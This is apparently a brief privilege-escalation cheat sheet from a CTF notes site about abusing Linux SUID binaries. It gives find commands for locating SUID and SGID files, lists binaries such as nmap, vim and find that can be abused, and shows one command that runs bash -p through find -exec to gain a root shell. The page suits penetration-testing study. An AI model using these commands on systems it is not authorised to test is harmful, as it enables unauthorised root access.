>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Privilege Escalation / SUID Binary Abuse

SUID Binary Abuse

Privilege Escalation Linux Privesc linux

Find SUID binaries

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm /4000

Find SGID binaries

find / -perm -g=s -type f 2>/dev/null

Common SUID-abusable binaries

nmap, vim, find, bash, more, less, nano, cp.

find example escalation

find /home/joe/Desktop -exec "/usr/bin/bash" -p \;

Reference

https://gtfobins.github.io/